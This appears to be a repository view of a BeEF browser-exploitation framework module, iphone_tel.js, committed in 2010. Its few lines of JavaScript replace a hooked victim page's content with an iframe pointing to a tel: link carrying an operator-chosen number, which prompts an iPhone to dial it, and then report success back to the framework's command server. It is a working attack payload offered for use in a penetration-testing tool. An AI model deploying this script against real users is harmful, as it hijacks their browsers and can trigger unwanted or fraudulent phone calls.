Files
beef/modules/commands/host/iphone_tel/iphone_tel.js
xntrik b23c1206af issue 149 : iphone telephone calling module
git-svn-id: https://beef.googlecode.com/svn/trunk@585 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
2010-11-27 09:23:11 +00:00

6 lines
195 B
JavaScript

beef.execute(function() {
document.body.innerHTML = "<iframe src=tel:<%= @tel_num %>></iframe>";
beef.net.sendback("<%= @command_url %>", <%= @command_id %>, "result=IFrame Created!");
});